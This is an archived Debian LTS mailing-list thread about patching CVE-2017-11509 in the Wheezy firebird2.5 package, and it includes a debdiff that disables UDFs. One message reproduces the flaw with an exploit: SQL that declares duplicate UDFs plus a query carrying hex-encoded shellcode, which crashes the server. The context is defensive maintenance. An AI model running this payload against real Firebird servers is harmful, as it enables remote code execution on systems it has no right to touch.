Re: Wheezy update of firebird2.5?

2018-05-09 Thread Brian May 
Damyan Ivanov  writes:

> I have added you to https://salsa.debian.org/firebird-team/firebird2.5 
> so feel free to push you work. Thanks!

Ok, done.

Packages are available for testing at:

https://people.debian.org/~bam/debian/pool/main/f/firebird2.5/
-- 
Brian May

Re: Wheezy update of firebird2.5?

2018-05-08 Thread Damyan Ivanov 
-=| Brian May, 08.05.2018 17:19:56 +1000 |=-
> Damyan Ivanov  writes:
> > The only fix upstream has is to disable UDFs in firebird.conf -- 
> > https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
> >  
> > (probebly needs adaptation for firebird2.5, but you get the idea).
> 
> The patch appears to apply fine without dramas. Attached is the debdiff
> from the previous LTS release.
> 
> Just compiling it now, but don't expect any problems.
> 
> Damyan,
> 
> Assuming I have write access to the firebird2.5 respository, do you have
> any objections if I push my changes (including the previous LTS release)
> to the wheezy branch in the git repository?

Sure!

I have added you to https://salsa.debian.org/firebird-team/firebird2.5 
so feel free to push you work. Thanks!


-- Damyan

Re: Wheezy update of firebird2.5?

2018-05-08 Thread Brian May 
Damyan Ivanov  writes:

> -=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
>> I don't quite know where to go from here. I was somewhat hoping that
>> Wheezy would be magically not vulnerable to this issue, but obviously,
>> there's something wrong here that should probably be fixed.
>
> The only fix upstream has is to disable UDFs in firebird.conf -- 
> https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
>  
> (probebly needs adaptation for firebird2.5, but you get the idea).

The patch appears to apply fine without dramas. Attached is the debdiff
from the previous LTS release.

Just compiling it now, but don't expect any problems.

Damyan,

Assuming I have write access to the firebird2.5 respository, do you have
any objections if I push my changes (including the previous LTS release)
to the wheezy branch in the git repository?

Regards
-- 
Brian May 

diff -Nru firebird2.5-2.5.2.26540.ds4/debian/changelog firebird2.5-2.5.2.26540.ds4/debian/changelog
--- firebird2.5-2.5.2.26540.ds4/debian/changelog	2017-03-30 06:01:20.0 +1100
+++ firebird2.5-2.5.2.26540.ds4/debian/changelog	2018-05-07 17:39:32.0 +1000
@@ -1,3 +1,13 @@
+firebird2.5 (2.5.2.26540.ds4-1~deb7u4) UNRELEASED; urgency=high
+
+  * Non-maintainer upload by the LTS Team.
+  * Disable UDFs in firebird.conf due to a remote authenticated code execution
+vilnerability
+https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509)
+http://tracker.firebirdsql.org/browse/CORE-5518
+
+ -- Brian May   Mon, 07 May 2018 17:39:32 +1000
+
 firebird2.5 (2.5.2.26540.ds4-1~deb7u3) wheezy-security; urgency=high
 
   * Non-maintainer upload by the LTS Security Team.
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/gbp.conf firebird2.5-2.5.2.26540.ds4/debian/gbp.conf
--- firebird2.5-2.5.2.26540.ds4/debian/gbp.conf	2013-07-23 08:21:41.0 +1000
+++ firebird2.5-2.5.2.26540.ds4/debian/gbp.conf	2018-05-07 17:39:32.0 +1000
@@ -1,2 +1,2 @@
 [DEFAULT]
-debian-branch=master
+debian-branch=wheezy
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch
--- firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch	1970-01-01 10:00:00.0 +1000
+++ firebird2.5-2.5.2.26540.ds4/debian/patches/CVE-2017-11509.patch	2018-05-07 17:39:32.0 +1000
@@ -0,0 +1,23 @@
+Description: disable UDFs in firebird.conf
+ UDFs can be used for remote code execution. see
+ https://www.tenable.com/security/research/tra-2017-36 (CVE-2017-11509)
+ http://tracker.firebirdsql.org/browse/CORE-5518
+Author: Damyan Ivanov 
+Forwarded: no, because upstream doesn't consider this to be a problem
+
+Index: firebird2.5/builds/install/misc/firebird.conf.in
+===
+--- firebird2.5.orig/builds/install/misc/firebird.conf.in
 firebird2.5/builds/install/misc/firebird.conf.in
+@@ -137,7 +137,10 @@
+ #
+ # Type: string (special format)
+ #
+-#UdfAccess = Restrict UDF
++# Debian maintainer note: UDFs can be used for remote code execution as the
++# 'firebird' user. See https://www.tenable.com/security/research/tra-2017-36
++# (CVE-2017-11509)
++UdfAccess = None
+ 
+ 
+ # 
diff -Nru firebird2.5-2.5.2.26540.ds4/debian/patches/series firebird2.5-2.5.2.26540.ds4/debian/patches/series
--- firebird2.5-2.5.2.26540.ds4/debian/patches/series	2017-03-30 02:09:54.0 +1100
+++ firebird2.5-2.5.2.26540.ds4/debian/patches/series	2018-05-07 17:39:32.0 +1000
@@ -19,3 +19,4 @@
 out/crash-create-db-restricted.patch
 upstream/r60322-remote-crash.patch
 CVE-2017-6369.patch
+CVE-2017-11509.patch

Re: Wheezy update of firebird2.5?

2018-04-17 Thread Damyan Ivanov 
-=| Antoine Beaupré, 17.04.2018 12:59:26 -0400 |=-
> I don't quite know where to go from here. I was somewhat hoping that
> Wheezy would be magically not vulnerable to this issue, but obviously,
> there's something wrong here that should probably be fixed.

The only fix upstream has is to disable UDFs in firebird.conf -- 
https://salsa.debian.org/firebird-team/firebird3.0/blob/master/debian/patches/deb/cve-2017-11509.patch
 
(probebly needs adaptation for firebird2.5, but you get the idea).


-- dam

Re: Wheezy update of firebird2.5?

2018-04-17 Thread Antoine Beaupré 
On 2018-04-04 19:54:14, Damyan Ivanov wrote:
> -=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
>> Dear maintainer(s),
>> 
>> The Debian LTS team would like to fix the security issues which are
>> currently open in the Wheezy version of firebird2.5:
>> https://security-tracker.debian.org/tracker/source-package/firebird2.5
>> 
>> Would you like to take care of this yourself?
>
> Sorry, no.
>
> AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the 
> security team advised against updating that for stable, and the issue 
> is still open in unstable.
>
> According to the researchers discovering it, upstream refused to fix 
> it :( so the only "fix" I am aware of is the change in the default 
> config to disable the vulnerable functionality. You can find the patch 
> for firebird3.0 at 
> https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698
>
> It is perhaps not directly applicable to firebid2.5, but should help 
> regardless.

I tried digging into this issue a little further, and couldn't get
far. I always have this hurdle to just setup a test environment with
Firebird, so I figured I would share the procedure here for the future,
so that I wouldn't have to rebuild this from scratch every time.

 1. install the database and packages:

apt-get install firebird2.5-examples firebird2.5-dev 
firebird2.5-superclassic

 2. set a admin password and configure the server:

dpkg-reconfigure firebird2.5-superclassic

 3. deploy a test database:

gunzip -c 
/usr/share/doc/firebird2.5-examples/examples/empbuild/employee.fdb.gz > 
/var/lib/firebird/2.5/data/employee.fdb
chown firebird.firebird /var/lib/firebird/2.5/data/employee.fdb

 4. connect to the database, in a `isql-fb` prompt:

SQL> connect "localhost:/var/lib/firebird/2.5/data/employee.fdb" user 
'SYSDBA' password 'password';

Then you can do stuff like `SHOW TABLES` and so on. In particular, I
have tried to reproduce the issue and I can confirm I can create two
external functions with the same ENTRY_POINT, although the second
snippet in the advisory has two `DECLARE` statements which I assume is a
typo:

DECLARE EXTERNAL FUNCTION string2blob
   VARCHAR(300) BY DESCRIPTOR,
   BLOB RETURNS PARAMETER 2
   ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

DECLARE EXTERNAL FUNCTION a6
  VARCHAR(300) BY DESCRIPTOR,
  VARCHAR(400) BY DESCRIPTOR
  RETURNS INTEGER
  ENTRY_POINT 'string2blob' MODULE_NAME 'fbudf'

The actual query to trigger arbitrary code execution seems to fail,
however:

SQL> select a6((select 
x'31db648b7b308b7f0c8b7f1c8b47088b77208b3f807e0c3375f289c703783c8b577801c28b7a2001c789dd8b34af01c645813e4372656175f2817e086f63657375e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd6863616c6389e252525353535353535253ffd7'
 from rdb$database), (select x'C8FD8503' from rdb$database)) from 
rdb$databaseStatement failed, SQLSTATE = 08006
Unable to complete network request to host "localhost".
-Error writing data to the connection.

Considering it was crafted to start `CALC.EXE` in Windows, that might be
expected. We do see a segfault in the logs however:

wheezy  Tue Apr 17 16:49:56 2018
The user defined function:  A6
   referencing entrypoint:  string2blob
in module:  fbudf
caused the fatal exception: Segmentation Fault.
The code attempted to access memory
without privilege to do so.
This exception will cause the Firebird server
to terminate abnormally.

... which is probably a bad sign.

I don't quite know where to go from here. I was somewhat hoping that
Wheezy would be magically not vulnerable to this issue, but obviously,
there's something wrong here that should probably be fixed.

A.

-- 
Every time I see an adult on a bicycle I no longer despair for the
future of the human race.
 - H. G. Wells

Re: Wheezy update of firebird2.5?

2018-04-04 Thread Damyan Ivanov 
-=| Chris Lamb, 04.04.2018 08:39:52 +0100 |=-
> Dear maintainer(s),
> 
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/source-package/firebird2.5
> 
> Would you like to take care of this yourself?

Sorry, no.

AFAIS, the only open vulnerability is CVE-2017-11509. Moritz from the 
security team advised against updating that for stable, and the issue 
is still open in unstable.

According to the researchers discovering it, upstream refused to fix 
it :( so the only "fix" I am aware of is the change in the default 
config to disable the vulnerable functionality. You can find the patch 
for firebird3.0 at 
https://salsa.debian.org/firebird-team/firebird3.0/commit/5ad1c64f67ce9f091a2b747fa54519ef7d144698

It is perhaps not directly applicable to firebid2.5, but should help 
regardless.


Good luck!

Wheezy update of firebird2.5?

2018-04-04 Thread Chris Lamb 
Dear maintainer(s),

The Debian LTS team would like to fix the security issues which are
currently open in the Wheezy version of firebird2.5:
https://security-tracker.debian.org/tracker/source-package/firebird2.5

Would you like to take care of this yourself?

If yes, please follow the workflow we have defined here:
https://wiki.debian.org/LTS/Development

If that workflow is a burden to you, feel free to just prepare an
updated source package and send it to debian-lts@lists.debian.org
(via a debdiff, or with an URL pointing to the source package,
or even with a pointer to your packaging repository), and the members
of the LTS team will take care of the rest. Indicate clearly whether you
have tested the updated package or not.

If you don't want to take care of this update, it's not a problem, we
will do our best with your package. Just let us know whether you would
like to review and/or test the updated package before it gets released.

You can also opt-out from receiving future similar emails in your
answer and then the LTS Team will take care of firebird2.5 updates
for the LTS releases.

Thank you very much.

Chris Lamb,
  on behalf of the Debian LTS team.

PS: A member of the LTS team might start working on this update at
any point in time. You can verify whether someone is registered
on this update in this file:
https://salsa.debian.org/security-tracker-team/security-tracker/raw/master/data/dla-needed.txt


Regards,

-- 
  ,''`.
 : :'  : Chris Lamb
 `. `'`  la...@debian.org / chris-lamb.co.uk
   `-

Re: Wheezy update of firebird2.5?

2017-03-26 Thread Damyan Ivanov 
-=| Ola Lundqvist, 25.03.2017 22:46:35 +0100 |=-
> Dear maintainer(s),
> 
> The Debian LTS team would like to fix the security issues which are
> currently open in the Wheezy version of firebird2.5:
> https://security-tracker.debian.org/tracker/CVE-2017-6369

Please feel free to take this over writh the great LTS team. In case 
it would be of any help, the changes needed for the jessie upload are 
available at 
https://anonscm.debian.org/cgit/pkg-firebird/2.5.git/log/?h=jessie

-- dam


signature.asc
Description: Digital signature

Wheezy update of firebird2.5?

2017-03-25 Thread Ola Lundqvist 
Dear maintainer(s),

The Debian LTS team would like to fix the security issues which are
currently open in the Wheezy version of firebird2.5:
https://security-tracker.debian.org/tracker/CVE-2017-6369

Would you like to take care of this yourself?

If yes, please follow the workflow we have defined here:
https://wiki.debian.org/LTS/Development

If that workflow is a burden to you, feel free to just prepare an
updated source package and send it to debian-lts@lists.debian.org
(via a debdiff, or with an URL pointing to the source package,
or even with a pointer to your packaging repository), and the members
of the LTS team will take care of the rest. Indicate clearly whether you
have tested the updated package or not.

If you don't want to take care of this update, it's not a problem, we
will do our best with your package. Just let us know whether you would
like to review and/or test the updated package before it gets released.

You can also opt-out from receiving future similar emails in your
answer and then the LTS Team will take care of firebird2.5 updates
for the LTS releases.

Thank you very much.

Ola Lundqvist,
  on behalf of the Debian LTS team.

PS: A member of the LTS team might start working on this update at
any point in time. You can verify whether someone is registered
on this update in this file:
https://anonscm.debian.org/viewvc/secure-testing/data/dla-needed.txt?view=markup